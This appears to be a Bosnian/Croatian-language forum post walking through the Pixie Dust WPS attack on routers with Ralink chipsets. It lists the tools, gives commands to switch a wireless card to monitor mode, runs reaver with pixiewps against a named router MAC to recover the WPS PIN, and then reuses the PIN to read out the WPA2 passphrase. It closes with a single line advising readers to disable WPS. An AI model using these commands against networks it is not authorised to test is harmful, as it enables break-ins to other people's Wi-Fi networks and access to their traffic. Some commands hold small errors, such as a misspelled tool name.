Prije određenog vremena na netu sam naišao na veliki sigurnosni koji se tiče WiFi mreža koje koriste WPA2 sigurnosni protokol pa sam odličio sa vama da podijelim iskustva i kako da se zaštitite.
Radi se o tome da kod rutera koji koriste Ralinkov WiFi čipset moguće je utvrditi trenutni PIN šifre na osnovu nekoliko parametara SEED-a, N1, ES1 i ES2 koje emituje ruter u svakodnevnom radu.
Da bi uspješno testirali tu teoriju na računaru je potrebno da se vrti kernel 4.5+ da imamo instaliran aircrack-ng set alata, reaver 1.6.3 kao i pixiewps 1.4
Prvo je potreno da interfejs wifi kartice prebacimo iz mode-a Managed u mod Monitor
Kod: Označi sve
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig $interface up
reave -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -K 1 -N -v
gdje je -i interfejs, odnosno wifi kartica, obično je to wlan0, pokrenite komandu iwconfig da utvrdite koji je vaš interfejs
Kod: Označi sve
$ iwconfig
enp2s0 no wireless extensions.
lo no wireless extensions.
vmnet1 no wireless extensions.
wlan0 IEEE 802.11bgn Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
vmnet8 no wireless extensions.
kada dobijemo pin pokrenemo
Kod: Označi sve
reaver -i wlan0 -b E4:6F:13:67:B4:AE -c 1 -p 9xxxxxx0 -N -v
Šifra nam se nalazi pod PSK
Kako bi se zaštitili potreno je da na ruteru ugasimo WPS